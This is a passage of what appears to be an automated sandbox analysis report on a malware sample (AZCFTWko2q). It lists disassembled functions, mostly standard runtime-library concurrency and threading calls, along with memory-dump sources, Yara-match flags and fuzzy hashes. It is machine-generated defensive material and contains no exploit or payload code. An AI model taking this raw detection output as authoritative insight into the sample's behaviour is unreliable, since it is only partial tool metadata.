                                                                                                                                                                                                                                                                                      • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                                                                      Function 024DC13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC170
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC180
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC190
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC1A4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction ID: fd19ad043427d46b40b90821db1211e7958cda1eb0dfa16cd4f396e399c813a9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A01193A004129BBDF139E94DC918AE7B66AF25350F048517F928C4170D732D6B2EF81
                                                                                                                                                                                                                                                                                      Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                                                                      Function 024D3773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024D378C
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024D2B2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024D2B4B
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 024D37A8
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D37BE
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D37CC
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D28EC: SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                                      • Instruction ID: d2598334a69d68ba9462d9f3fe4cf601aa05e88b38dbfd594def069115570f7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F027B2A002153AE720FB724C06FBB3A9C9F00741F50086BFC05E3181EAD9D4048AB5
                                                                                                                                                                                                                                                                                      Function 024CD486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024D1342
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024D0BD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024D0BF7
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024D1355
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024D1361
                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024D136A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                                      • Instruction ID: eac07f53f57a1d05a74adbcbdcc8a4ae022a4fffd785b842303492d79dca9dd0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92F0B431704704A7EF147EBA087057E31979F55314F24416FE91A9F380DEB59D419A94
                                                                                                                                                                                                                                                                                      Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                                                                        • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                                                                        • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                                                                      Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                                                                                                                                                                                                        • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                                                                                                                                                                                                        • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00413541
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                                      • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                                                                                                                                                                                                      Function 024DD074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024DD088
                                                                                                                                                                                                                                                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024DD0AC
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024DD0BF
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024DD0CD
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3657713681-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                                      • Instruction ID: b133972a85dcb78e6fe189d8df57f1c85926d33bdfad2fd17e28cae86ba71ccd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F05936E00204E3C725FA16D860D5EB37A9ED0B183A0852FD80557289DB31A90ACE62
                                                                                                                                                                                                                                                                                      Function 024C5A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Cnd_initX.LIBCPMT ref: 024C5A83
                                                                                                                                                                                                                                                                                      • __Cnd_signal.LIBCPMT ref: 024C5A8F
                                                                                                                                                                                                                                                                                      • std::_Cnd_initX.LIBCPMT ref: 024C5AA4
                                                                                                                                                                                                                                                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024C5AAB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                                      • Instruction ID: e1708fdd5644ad95e6e352a4f0b99c7eb75359d2f58bfffaa21d6bff62617db7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6F0E539400700EFEB657B7BD80571A73E3AF01328F74482FE05A969A0DFBAE8148E55
                                                                                                                                                                                                                                                                                      Function 024D2858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024D286F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,024D8830,?,?,?,?,00000000,?,00000000), ref: 024D287E
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2894
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D28A2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                                      • Instruction ID: e3f0846953e47bae62c94b55cea0850d469fd2712403c4d290456520c8063172
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0A03450020ABBCF00EFB5CD44EAF37B86B00701F200616F921E20A1DB75D6049B64
                                                                                                                                                                                                                                                                                      Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                                      • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                                                                      Function 024D257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___crtCreateEventExW.LIBCPMT ref: 024D2593
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,024D0DA0), ref: 024D25A1
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D25B7
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D25C5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 200240550-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                                      • Instruction ID: 4fb4ebef4aa5b2efcda973f871db5de69500fc4089e686306d836a9479c7901b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EE0D86160021539EB10F7764C32F7B369C5B00B41F54085AFD15E21C2FAD5E10449A4
                                                                                                                                                                                                                                                                                      Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 200240550-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                                      • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                                                                      Function 024D9530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D2959: TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
                                                                                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,024D0DA0), ref: 024E3BE6
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 024E3BF8
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024E3C0E
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024E3C1C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                                      • Instruction ID: 02904571e3068f448a2adb13cf8600342ef3c3ecb4dba3a42be15e99bcb7cbe2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93E061345002056FDB00FF775C5967F3A646A003037100EABE927D31E2EB35D0054E5C
                                                                                                                                                                                                                                                                                      Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
